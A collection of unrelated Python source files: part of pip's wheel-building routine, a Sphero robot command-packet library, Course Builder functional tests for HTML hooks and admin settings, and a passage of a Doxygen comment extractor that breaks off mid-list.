autobuilding and self.wheel_cache.cache_dir
)
assert building_is_possible
buildset = []
for req in requirements:
if req.constraint:
continue
if req.is_wheel:
if not autobuilding:
logger.info(
'Skipping %s, due to already being wheel.', req.name,
)
elif autobuilding and req.editable:
pass
elif autobuilding and not req.source_dir:
pass
elif autobuilding and req.link and not req.link.is_artifact:
# VCS checkout. Build wheel just for this run.
buildset.append((req, True))
else:
ephem_cache = False
if autobuilding:
link = req.link
base, ext = link.splitext()
if index.egg_info_matches(base, None, link) is None:
# E.g. local directory. Build wheel just for this run.
ephem_cache = True
if "binary" not in index.fmt_ctl_formats(
self.finder.format_control,
canonicalize_name(req.name)):
logger.info(
"Skipping bdist_wheel for %s, due to binaries "
"being disabled for it.", req.name,
)
continue
buildset.append((req, ephem_cache))
if not buildset:
return True
# Build the wheels.
logger.info(
'Building wheels for collected packages: %s',
', '.join([req.name for (req, _) in buildset]),
)
_cache = self.wheel_cache # shorter name
with indent_log():
build_success, build_failure = [], []
for req, ephem in buildset:
python_tag = None
if autobuilding:
python_tag = pep425tags.implementation_tag
if ephem:
output_dir = _cache.get_ephem_path_for_link(req.link)
else:
output_dir = _cache.get_path_for_link(req.link)
try:
ensure_dir(output_dir)
except OSError as e:
logger.warning("Building wheel for %s failed: %s",
req.name, e)
build_failure.append(req)
continue
else:
output_dir = self._wheel_dir
wheel_file = self._build_one(
req, output_dir,
python_tag=python_tag,
)
if wheel_file:
build_success.append(req)
if autobuilding:
# XXX: This is mildly duplicative with prepare_files,
# but not close enough to pull out to a single common
# method.
# The code below assumes temporary source dirs -
# prevent it doing bad things.
if req.source_dir and not os.path.exists(os.path.join(
req.source_dir, PIP_DELETE_MARKER_FILENAME)):
raise AssertionError(
"bad source dir - missing marker")
# Delete the source we built the wheel from
req.remove_temporary_source()
# set the build directory again - name is known from
# the work prepare_files did.
req.source_dir = req.build_location(
self.preparer.build_dir
)
# Update the link for this.
req.link = index.Link(path_to_url(wheel_file))
assert req.link.is_wheel
# extract the wheel into the dir
unpack_url(
req.link, req.source_dir, None, False,
session=session,
)
else:
build_failure.append(req)
# notify success/failure
if build_success:
logger.info(
'Successfully built %s',
' '.join([req.name for req in build_success]),
)
if build_failure:
logger.info(
'Failed to build %s',
' '.join([req.name for req in build_failure]),
)
# Return True if all builds were successful
return len(build_failure) == 0
|
|
# coding: utf-8
import struct
import response
class Request(object):
SOP1 = 0xFF
SOP2 = 0xFF
did = 0x00
cid = 0x00
fmt = None
def __init__(self, seq=0x00, *data):
self.seq = seq
self.data = data
if not self.fmt:
self.fmt = '%sB' % len(self.data)
def __str__(self):
return self.bytes
def checksum(self):
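        # Checksum: sum of every byte after the two SOP bytes (DID, CID, SEQ,
        # DLEN and payload), taken modulo 256 and then bitwise inverted.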
body = self.packet_header() + self.packet_body()
body = struct.unpack('%sB' % len(body), body)
return struct.pack('B', ~(sum(body[2:]) % 256) & 0xFF)
@property
def bytes(self):
return self.packet_header() + self.packet_body() + self.checksum()
def packet_header(self):
return struct.pack('6B', *self.header())
def packet_body(self):
if not self.data:
return ''
return struct.pack(self.fmt, *self.data)
@property
def dlen(self):
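        # Data length field: size of the packed payload plus one for the
        # trailing checksum byte.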
return struct.calcsize(self.fmt) + 1
def header(self):
return [self.SOP1, self.SOP2, self.did, self.cid, self.seq, self.dlen]
def response(self, header, body):
name = self.__class__.__name__.split('.')[-1]
klass = getattr(response, name, response.Response)
return klass(header, body)
class Core(Request):
did = 0x00
class Ping(Core):
cid = 0x01
class GetVersion(Core):
cid = 0x02
class SetDeviceName(Core):
cid = 0x10
class GetBluetoothInfo(Core):
cid = 0x11
class GetAutoReconnect(Core):
cid = 0x12
class SetAutoReconnect(Core):
cid = 0x13
class GetPowerState(Core):
cid = 0x20
class SetPowerNotification(Core):
cid = 0x21
class Sleep(Core):
cid = 0x22
class GetVoltageTripPoints(Core):
cid = 0x23
class SetVoltageTripPoints(Core):
cid = 0x24
class SetInactivityTimeout(Core):
cid = 0x25
class JumpToBootloader(Core):
cid = 0x30
class PerformLevel1Diagnostics(Core):
cid = 0x40
class PerformLevel2Diagnostics(Core):
cid = 0x41
class ClearCounters(Core):
cid = 0x42
class SetTimeValue(Core):
cid = 0x50
class PollPacketTimes(Core):
cid = 0x51
#Sphero Commands
class Sphero(Request):
did = 0x02
class SetHeading(Sphero):
cid = 0x01
fmt = '!H'
class SetStabilization(Sphero):
cid = 0x02
class SetRotationRate(Sphero):
cid = 0x03
class SetApplicationConfigurationBlock(Sphero):
cid = 0x04
class GetApplicationConfigurationBlock(Sphero):
cid = 0x05
class ReenableDemoMode(Sphero):
cid = 0x06
class GetChassisId(Sphero):
cid = 0x07
class SetChassisId(Sphero):
cid = 0x08
class SelfLevel(Sphero):
cid = 0x09
class SetVDL(Sphero):
cid = 0x0A
class SetDataStreaming(Sphero):
cid = 0x11
class ConfigureCollisionDetection(Sphero):
cid = 0x12
class Locator(Sphero):
cid = 0x13
class SetAccelerometer(Sphero):
cid = 0x14
class ReadLocator(Sphero):
cid=0x15
class SetRGB(Sphero):
cid = 0x20
class SetBackLEDOutput(Sphero):
cid = 0x21
class GetRGB(Sphero):
cid = 0x22
class Roll(Sphero):
fmt = '!BHB' #Speed, heading, state
cid = 0x30
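    # Illustrative packet (arbitrary values): Roll(0x00, 0x80, 0x0000, 0x01),
    # i.e. seq=0x00, speed=0x80, heading=0x0000, state=0x01, encodes as
    #   FF FF 02 30 00 05 80 00 00 01 47
    # where 0x05 is DLEN (4 payload bytes + checksum) and 0x47 is the checksum.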
class SetBoostWithTime(Sphero):
cid = 0x31
class SetRawMotorValues(Sphero):
cid = 0x33
class SetMotionTimeout(Sphero):
cid = 0x34
class SetOptionFlags(Sphero):
cid = 0x35
class GetOptionFlags(Sphero):
cid = 0x36
class GetConfigurationBlock(Sphero):
cid = 0x40
class GetDeviceMode(Sphero):
cid = 0x42
class RunMacro(Sphero):
cid = 0x50
class SaveTemporaryMacro(Sphero):
cid = 0x51
class ReinitMacro(Sphero):
cid = 0x54
class AbortMacro(Sphero):
cid = 0x55
class GetMacroStatus(Sphero):
cid = 0x56
class SetMacroParameter(Sphero):
cid = 0x57
class AppendMacroChunk(Sphero):
cid = 0x58
class EraseOrbbasicStorage(Sphero):
cid = 0x60
class AppendOrbbasicFragment(Sphero):
cid = 0x61
class RunOrbbasicProgram(Sphero):
cid = 0x62
class AbortOrbbasicProgram(Sphero):
cid = 0x63
class AnswerInput(Sphero):
cid = 0x64
|
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that walk through Course Builder pages."""
__author__ = 'Mike Gainer (mgainer@google.com)'
import cgi
import re
import urllib
from common import crypto
from common import utils as common_utils
from controllers import sites
from controllers import utils
from models import courses
from models import models
from models import transforms
from modules.courses import settings
from modules.dashboard import filer
from modules.i18n_dashboard import i18n_dashboard
from tests.functional import actions
from tests.functional.actions import assert_contains
COURSE_NAME = 'admin_settings'
COURSE_TITLE = 'Admin Settings'
ADMIN_EMAIL = 'admin@foo.com'
NAMESPACE = 'ns_%s' % COURSE_NAME
BASE_URL = '/' + COURSE_NAME
ADMIN_SETTINGS_URL = '/%s%s' % (
COURSE_NAME, settings.HtmlHookRESTHandler.URI)
TEXT_ASSET_URL = '/%s%s' % (
COURSE_NAME, filer.TextAssetRESTHandler.URI)
STUDENT_EMAIL = 'student@foo.com'
SETTINGS_URL = '/%s/dashboard?action=settings_admin_prefs' % COURSE_NAME
class AdminSettingsTests(actions.TestBase):
def setUp(self):
super(AdminSettingsTests, self).setUp()
actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL, COURSE_TITLE)
actions.login(ADMIN_EMAIL)
def test_defaults(self):
prefs = models.StudentPreferencesDAO.load_or_default()
self.assertEquals(False, prefs.show_hooks)
class WelcomePageTests(actions.TestBase):
def setUp(self):
super(WelcomePageTests, self).setUp()
self.auto_deploy = sites.ApplicationContext.AUTO_DEPLOY_DEFAULT_COURSE
sites.ApplicationContext.AUTO_DEPLOY_DEFAULT_COURSE = False
def tearDown(self):
sites.ApplicationContext.AUTO_DEPLOY_DEFAULT_COURSE = self.auto_deploy
super(WelcomePageTests, self).tearDown()
def test_welcome_page(self):
actions.login(ADMIN_EMAIL, is_admin=True)
response = self.get('/')
self.assertEqual(response.status_int, 302)
self.assertEqual(
response.headers['location'],
'http://localhost/admin/welcome')
response = self.get('/admin/welcome?action=welcome')
assert_contains('Welcome to Course Builder', response.body)
assert_contains('action="/admin/welcome"', response.body)
assert_contains('Start Using Course Builder', response.body)
def test_welcome_page_button(self):
actions.login(ADMIN_EMAIL, is_admin=True)
response = self.post('/admin/welcome', {})
self.assertEqual(response.status_int, 302)
self.assertEqual(
response.headers['location'],
'http://localhost/modules/admin')
class HtmlHookTest(actions.TestBase):
def setUp(self):
super(HtmlHookTest, self).setUp()
self.app_context = actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL,
COURSE_TITLE)
self.course = courses.Course(None, self.app_context)
actions.login(ADMIN_EMAIL, is_admin=True)
self.xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
settings.HtmlHookRESTHandler.XSRF_ACTION)
def tearDown(self):
the_settings = self.course.get_environ(self.app_context)
the_settings.pop('foo', None)
the_settings['html_hooks'].pop('foo', None)
self.course.save_settings(the_settings)
super(HtmlHookTest, self).tearDown()
def test_hook_edit_button_presence(self):
# Turn preference on; expect to see hook editor button
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = True
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertIn('gcb-html-hook-edit', response.body)
# Turn preference off; expect editor button not present.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = False
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertNotIn('gcb-html-hook-edit', response.body)
def test_non_admin_permissions_failures(self):
actions.login(STUDENT_EMAIL)
student_xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
settings.HtmlHookRESTHandler.XSRF_ACTION)
response = self.get(ADMIN_SETTINGS_URL)
self.assertEquals(200, response.status_int)
payload = transforms.loads(response.body)
self.assertEquals(401, payload['status'])
self.assertEquals('Access denied.', payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'key': 'base:after_body_tag_begins',
'xsrf_token': cgi.escape(student_xsrf_token),
'payload': '{}'})})
payload = transforms.loads(response.body)
self.assertEquals(401, payload['status'])
self.assertEquals('Access denied.', payload['message'])
response = self.delete(ADMIN_SETTINGS_URL + '?xsrf_token=' +
cgi.escape(student_xsrf_token))
self.assertEquals(200, response.status_int)
payload = transforms.loads(response.body)
self.assertEquals(401, payload['status'])
self.assertEquals('Access denied.', payload['message'])
def test_malformed_requests(self):
response = self.put(ADMIN_SETTINGS_URL, {})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Missing "request" parameter.', payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': 'asdfasdf'})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Malformed "request" parameter.', payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token)})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Request missing "key" parameter.',
payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base:after_body_tag_begins'})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Request missing "payload" parameter.',
payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base:after_body_tag_begins',
'payload': 'asdfsdfasdf'})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Malformed "payload" parameter.',
payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base:after_body_tag_begins',
'payload': '{}'})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Payload missing "hook_content" parameter.',
payload['message'])
def test_get_unknown_hook_content(self):
# Should be safe (but unhelpful) to ask for no hook.
response = transforms.loads(self.get(ADMIN_SETTINGS_URL).body)
payload = transforms.loads(response['payload'])
self.assertIsNone(payload['hook_content'])
def test_get_defaulted_hook_content(self):
url = '%s?key=%s' % (
ADMIN_SETTINGS_URL, cgi.escape('base.after_body_tag_begins'))
response = transforms.loads(self.get(url).body)
self.assertEquals(200, response['status'])
self.assertEquals('Success.', response['message'])
payload = transforms.loads(response['payload'])
self.assertEquals('<!-- base.after_body_tag_begins -->',
payload['hook_content'])
def test_page_has_defaulted_hook_content(self):
response = self.get(BASE_URL)
self.assertIn('<!-- base.after_body_tag_begins -->', response.body)
def test_set_hook_content(self):
html_text = '<table><tbody><tr><th>;<></th></tr></tbody></table>'
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base.after_body_tag_begins',
'payload': transforms.dumps(
{'hook_content': html_text})})})
self.assertEquals(200, response.status_int)
response = transforms.loads(response.body)
self.assertEquals(200, response['status'])
self.assertEquals('Saved.', response['message'])
# And verify that the changed text appears on course pages.
# NOTE that text is as-is; no escaping of special HTML
# characters should have been done.
response = self.get(BASE_URL)
self.assertIn(html_text, response.body)
def test_delete_default_content_ineffective(self):
response = self.get(BASE_URL)
self.assertIn('<!-- base.after_body_tag_begins -->', response.body)
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape('base.after_body_tag_begins'),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.delete(url).body)
self.assertEquals(200, response['status'])
self.assertEquals('Deleted.', response['message'])
response = self.get(BASE_URL)
self.assertIn('<!-- base.after_body_tag_begins -->', response.body)
def test_manipulate_non_default_item(self):
html_text = '<table><tbody><tr><th>;<></th></tr></tbody></table>'
new_hook_name = 'html.some_new_hook'
# Verify that content prior to setting is blank.
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape(new_hook_name),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.get(url).body)
payload = transforms.loads(response['payload'])
self.assertIsNone(payload['hook_content'])
# Set the content.
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': new_hook_name,
'payload': transforms.dumps(
{'hook_content': html_text})})})
self.assertEquals(200, response.status_int)
response = transforms.loads(response.body)
self.assertEquals(200, response['status'])
self.assertEquals('Saved.', response['message'])
# Verify that content after setting is as expected
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape(new_hook_name),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.get(url).body)
payload = transforms.loads(response['payload'])
self.assertEquals(html_text, payload['hook_content'])
# Delete the content.
response = transforms.loads(self.delete(url).body)
self.assertEquals(200, response['status'])
self.assertEquals('Deleted.', response['message'])
# Verify that content after setting is None.
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape(new_hook_name),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.get(url).body)
payload = transforms.loads(response['payload'])
self.assertIsNone(payload['hook_content'])
def test_add_new_hook_to_page(self):
hook_name = 'html.my_new_hook'
html_text = '<table><tbody><tr><th>;<></th></tr></tbody></table>'
key = 'views/base.html'
url = '%s?key=%s' % (
TEXT_ASSET_URL, cgi.escape(key))
# Get base page template.
response = transforms.loads(self.get(url).body)
xsrf_token = response['xsrf_token']
payload = transforms.loads(response['payload'])
contents = payload['contents']
# Add hook specification to page content.
contents = contents.replace(
'<body data-gcb-page-locale="{{ page_locale }}">',
'<body data-gcb-page-locale="{{ page_locale }}">\n' +
'{{ html_hooks.insert(\'%s\') | safe }}' % hook_name)
self.put(TEXT_ASSET_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(xsrf_token),
'key': key,
'payload': transforms.dumps({'contents': contents})})})
# Verify that new hook appears on page.
response = self.get(BASE_URL)
self.assertIn('id="%s"' % re.sub('[^a-zA-Z-]', '-', hook_name),
response.body)
# Verify that modified hook content appears on page
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': hook_name,
'payload': transforms.dumps(
{'hook_content': html_text})})})
response = self.get(BASE_URL)
self.assertIn(html_text, response.body)
def test_student_admin_hook_visibility(self):
actions.login(STUDENT_EMAIL, is_admin=False)
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = True
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertNotIn('gcb-html-hook-edit', response.body)
actions.login(ADMIN_EMAIL, is_admin=True)
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = True
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertIn('gcb-html-hook-edit', response.body)
def test_hook_i18n(self):
actions.update_course_config(
COURSE_NAME,
{
'html_hooks': {'base': {'after_body_tag_begins': 'foozle'}},
'extra_locales': [
{'locale': 'de', 'availability': 'available'},
]
})
hook_bundle = {
'content': {
'type': 'html',
'source_value': '',
'data': [{
'source_value': 'foozle',
'target_value': 'FUZEL',
}],
}
}
hook_key = i18n_dashboard.ResourceBundleKey(
utils.ResourceHtmlHook.TYPE, 'base.after_body_tag_begins', 'de')
with common_utils.Namespace(NAMESPACE):
i18n_dashboard.ResourceBundleDAO.save(
i18n_dashboard.ResourceBundleDTO(str(hook_key), hook_bundle))
# Verify non-translated version.
response = self.get(BASE_URL)
dom = self.parse_html_string(response.body)
html_hook = dom.find('.//div[@id="base-after-body-tag-begins"]')
self.assertEquals('foozle', html_hook.text)
# Set preference to translated language, and check that that's there.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.locale = 'de'
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
dom = self.parse_html_string(response.body)
html_hook = dom.find('.//div[@id="base-after-body-tag-begins"]')
self.assertEquals('FUZEL', html_hook.text)
# With no translation present, but preference set to foreign language,
# verify that we fall back to the original language.
# Remove translation bundle, and clear cache.
with common_utils.Namespace(NAMESPACE):
i18n_dashboard.ResourceBundleDAO.delete(
i18n_dashboard.ResourceBundleDTO(str(hook_key), hook_bundle))
i18n_dashboard.ProcessScopedResourceBundleCache.instance().clear()
response = self.get(BASE_URL)
dom = self.parse_html_string(response.body)
html_hook = dom.find('.//div[@id="base-after-body-tag-begins"]')
self.assertEquals('foozle', html_hook.text)
def test_hook_content_found_in_old_location(self):
actions.update_course_config(COURSE_NAME, {'foo': {'bar': 'baz'}})
self.assertEquals(
'baz', utils.HtmlHooks.get_content(self.course, 'foo.bar'))
def test_insert_on_page_and_hook_content_found_using_old_separator(self):
the_settings = self.course.get_environ(self.app_context)
the_settings['html_hooks']['foo'] = {'bar': 'baz'}
self.course.save_settings(the_settings)
hooks = utils.HtmlHooks(self.course)
content = hooks.insert('foo:bar')
self.assertEquals('<div class="gcb-html-hook" id="foo-bar">baz</div>',
str(content))
def test_hook_content_new_location_overrides_old_location(self):
actions.update_course_config(COURSE_NAME,
{'html_hooks': {'foo': {'bar': 'zab'}}})
actions.update_course_config(COURSE_NAME,
{'foo': {'bar': 'baz'}})
self.assertEquals(
'zab', utils.HtmlHooks.get_content(self.course, 'foo.bar'))
def test_hook_rest_edit_removes_from_old_location(self):
actions.update_course_config(COURSE_NAME,
{'html_hooks': {'foo': {'bar': 'zab'}}})
actions.update_course_config(COURSE_NAME,
{'foo': {'bar': 'baz'}})
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'foo.bar',
'payload': transforms.dumps({'hook_content': 'BAZ'})})})
env = self.course.get_environ(self.app_context)
self.assertNotIn('bar', env['foo'])
self.assertEquals('BAZ', env['html_hooks']['foo']['bar'])
def test_hook_rest_delete_removes_from_old_and_new_location(self):
actions.update_course_config(COURSE_NAME,
{'html_hooks': {'foo': {'bar': 'zab'}}})
actions.update_course_config(COURSE_NAME,
{'foo': {'bar': 'baz'}})
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape('foo.bar'),
cgi.escape(self.xsrf_token))
self.delete(url)
env = self.course.get_environ(self.app_context)
self.assertNotIn('bar', env['foo'])
self.assertNotIn('bar', env['html_hooks']['foo'])
class JinjaContextTest(actions.TestBase):
def setUp(self):
super(JinjaContextTest, self).setUp()
actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL, COURSE_TITLE)
actions.login(ADMIN_EMAIL, is_admin=True)
def _get_jinja_context_text(self, response):
root = self.parse_html_string(response.text)
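        # The Jinja context dump, when enabled, is assumed to be rendered in
        # the next-to-last <div> of the page body; return its text content.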
div = root.find('body/div[last()-1]')
return ''.join(div.itertext())
def test_show_jinja_context_presence(self):
# Turn preference on; expect to see context dump.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_jinja_context = True
models.StudentPreferencesDAO.save(prefs)
self.assertIn('is_read_write_course:',
self._get_jinja_context_text(self.get(BASE_URL)))
# Turn preference off; expect context dump not present.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_jinja_context = False
models.StudentPreferencesDAO.save(prefs)
self.assertNotIn('is_read_write_course:',
self._get_jinja_context_text(self.get(BASE_URL)))
def test_student_jinja_context_visibility(self):
actions.login(STUDENT_EMAIL, is_admin=False)
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_jinja_context = True
models.StudentPreferencesDAO.save(prefs)
self.assertNotIn('is_read_write_course:',
self._get_jinja_context_text(self.get(BASE_URL)))
class ExitUrlTest(actions.TestBase):
def setUp(self):
super(ExitUrlTest, self).setUp()
actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL, COURSE_TITLE)
actions.login(ADMIN_EMAIL, is_admin=True)
def test_exit_url(self):
base_url = '/%s/dashboard?action=settings_data_pump' % COURSE_NAME
url = base_url + '&' + urllib.urlencode({
'exit_url': 'dashboard?%s' % urllib.urlencode({
'action': 'data_pump'})})
response = self.get(url)
self.assertIn(
'cb_global.exit_url = \'dashboard?action=data_pump',
response.body)
|
|
"""
Fixed and improved version based on "extracting from C++ doxygen documented file Author G.D." and py++ code.
Distributed under the Boost Software License, Version 1.0. (See
accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
Extensively modified by C.M. Bruns April 2010.
"""
import re
from pygccxml import declarations
import unittest
import unicodedata
class doxygen_doc_extractor:
"""
Extracts Doxygen styled documentation from source or generates it from description.
"""
def __init__(self):
#for caching source
self.file_name = None
self.source = None
#__init__
def __call__(self, declaration):
if self.file_name != declaration.location.file_name:
self.file_name = declaration.location.file_name
self.source = open(declaration.location.file_name).readlines()
self.declaration = declaration
find_block_end = False
doc_lines = []
# First look for a same-line documentation:
same_line_index = declaration.location.line - 1 # off by one issue
line = self.source[same_line_index]
# print declaration, same_line_index, line
doc = extract_same_line_doc(line)
doc = clear_str(doc)
# print declaration, line
if doc:
# print """found same line documentation:
# %s
# '%s'""" % (line, doc)
if doc:
doc_lines.insert(0, doc)
# return self.finalize_doc_lines(doc_lines)
# Next look for a doxygen comment above the declaration
# Is there a pure comment line directly above the declaration?
line_index = declaration.location.line - 2
# March backwards in the file looking for comments, avoiding other declarations
while (line_index >= 0):
line = self.source[line_index]
if might_be_doxygen_comment_end_line(line):
break
if line.find(';') >= 0: # another declaration
break
line_index -= 1
if (line_index < 0):
return self.finalize_doc_lines(doc_lines) # Only blanks above declaration
line = self.source[line_index]
# print "investigating '%s'" % line
# print line_index
if not might_be_doxygen_comment_end_line(line):
# print "not end comment"
return self.finalize_doc_lines(doc_lines) # no doxygen comment here
# We need to know whether we are within a C-style comment "... */"
doc_lines.extend(self.grab_doxygen_comment(line_index))
return self.finalize_doc_lines(doc_lines)
#__call__()
def grab_doxygen_comment(self, line_index):
"""Returns a list of doxygen comments ending at line line_index"""
doc_lines = []
if line_index < 0:
return doc_lines
line = self.source[line_index]
# "///" lines are definitely doxygen comments
# print "checking line '%s'" % line
if is_cpp_comment_line(line):
# print "is cpp comment"
doc_lines.insert(0, clear_str(line))
# print "cpp comment", doc_lines
doc_lines = self.grab_doxygen_comment(line_index - 1) + doc_lines
elif is_c_end_comment(line):
# print "is c end comment"
doc_lines = self.grab_c_comment(line_index) + doc_lines
elif is_oneline_c_comment(line):
# print "is oneline c comment"
doc_lines.insert(0, clear_str(line))
doc_lines = self.grab_doxygen_comment(line_index - 1) + doc_lines
# print "one line C comment", doc_lines
return doc_lines
def grab_c_comment(self, line_index):
"""Returns a multiline c-style doxygen comment ending at line line_index"""
doc_lines = []
doc_lines.append(clear_str(self.source[line_index])) # final line of comment
while True:
line_index -= 1
            if line_index < 0:
                raise IndexError('End comment without start')
line = self.source[line_index]
doc_lines.insert(0, clear_str(line))
if is_c_start_comment(line):
break
if is_c_nondoxygen_start_comment(line):
return []
# print "C comment", doc_lines
        more_comment = self.grab_doxygen_comment(line_index - 1)
        # print "more comment = ", more_comment, self.source[line_index - 1]
        return more_comment + doc_lines
def is_code(self, tmp_str):
"""
Detects if tmp_str is code or not
"""
try:
beg = tmp_str.lstrip()[:2]
return beg != "//" and beg != "/*"
except:
pass
return False
#is_code()
def finalize_doc_lines(self, doc_lines):
if not doc_lines:
return None
final_doc_lines = [ line.replace("\n","\\n") for line in doc_lines[:-1] ]
final_doc_lines.append(doc_lines[-1].replace("\n",""))
# remove blank lines at the beginning and end
while final_doc_lines and final_doc_lines[0] == "":
final_doc_lines = final_doc_lines[1:]
while final_doc_lines and final_doc_lines[-1] == "":
final_doc_lines = final_doc_lines[:-1]
# class docstrings should start and end with a blank line
# http://www.python.org/dev/peps/pep-0257/
if declarations.is_class(self.declaration):
# print "is class", self.declaration
final_doc_lines.append("")
final_doc_lines.insert(0, "")
pass
result = '\"' + '\\n'.join(final_doc_lines) + '\"'
if isinstance( result, unicode ):
result = unicodedata.normalize('NFKD', result).encode('ascii','ignore')
assert isinstance(result, str)
return result
def clear_str(tmp_str):
"""
Replace */! by space and \brief, @fn, \param, etc
"""
if not tmp_str:
return None
# Keep indentation on left, but only after comment characters
# Remove initial spaces followed by comment characters of any kind
tmp_str = re.sub(r'^\s*[/*!]+', '', tmp_str)
# Remove final spaces and comment characters
tmp_str = re.sub(r'[/*]+$', '', tmp_str)
tmp_str = re.sub(r'\s+$', '', tmp_str)
# Remove "@brief" statements
tmp_str = re.sub(r'^(\s*)[\\@]brief\s?', r'\1', tmp_str)
tmp_str = reduce(clean, [tmp_str, "\\fn","@fn","\\ref","@ref", "\"", "\'", "\\c"])
# Transform param statements to epydoc format
tmp_str = re.sub(r'[@\\]param\s+([^ :]+):?', r'@param \1:', tmp_str)
    # Transform \a, \p and \c doxygen references to epydoc C{} code font
tmp_str = re.sub(r'\\[apc]\s(\S+)', r'C{\1}', tmp_str)
# Convert html lists to epydoc lists
tmp_str = re.sub(r'<(li|LI)>', ' - ', tmp_str)
tmp_str = re.sub(r'</(li|LI)>', '', tmp_str)
tmp_str = re.sub(r'</?(ul|UL|ol|OL)>', '', tmp_str)
# Convert doxygen \par headings to epydoc sections
m = re.match(r'^(\s*)\\par\s+(\S?.*\S)\s*$', tmp_str)
if m:
tmp_str = (m.group(1) + m.group(2) + "\n" + # Theory:
m.group(1) + len(m.group(2)) * "-") # -------
# Smooth over unicode conversion errors here, rather than waiting
# for trouble at Py++ source code generation time.
tmp_str = unicode(tmp_str, errors='ignore')
    #commands list taken from: http://www.stack.nl/~dimitri/doxygen/commands.html
replacement_list = [
# "a",
"addindex",
"addtogroup",
"anchor",
"arg",
"attention",
"author",
# "b",
# "brief",
"bug",
# "c",
"callgraph",
"callergraph",
"category",
"class",
("code","[Code]"),
"cond",
"copybrief",
"copydetails",
"copydoc",
"date",
"def",
"defgroup",
"deprecated",
"details",
"dir",
"dontinclude",
("dot","[Dot]"),
"dotfile",
"e",
"else",
"elseif",
"em",
("endcode","[/Code]"),
"endcond",
("enddot","[/Dot]"),
"endhtmlonly",
"endif",
"endlatexonly",
"endlink",
"endmanonly",
"endmsc",
"endverbatim",
"endxmlonly",
"enum",
"example",
"exception",
"extends",
"f$",
"f[",
"f]",
"f{",
"f}",
"file",
# "fn",
"headerfile",
"hideinitializer",
"htmlinclude",
"htmlonly",
"if",
"ifnot",
"image",
"implements",
"include",
"includelineno",
"ingroup",
"internal",
"invariant",
"interface",
"latexonly",
"li",
"line",
"link",
"mainpage",
"manonly",
"memberof",
"msc",
# "n",
"name",
"namespace",
"nosubgrouping",
"note",
"overload",
# "p",
"package",
"page",
# "par",
"paragraph",
# "param",
"post",
"pre",
# "private (PHP only)",
# "privatesection (PHP only)",
"property",
# "protected (PHP only)",
# "protectedsection (PHP only)",
"protocol",
# "public (PHP only)",
# "publicsection (PHP only)",
# "ref",
"relates",
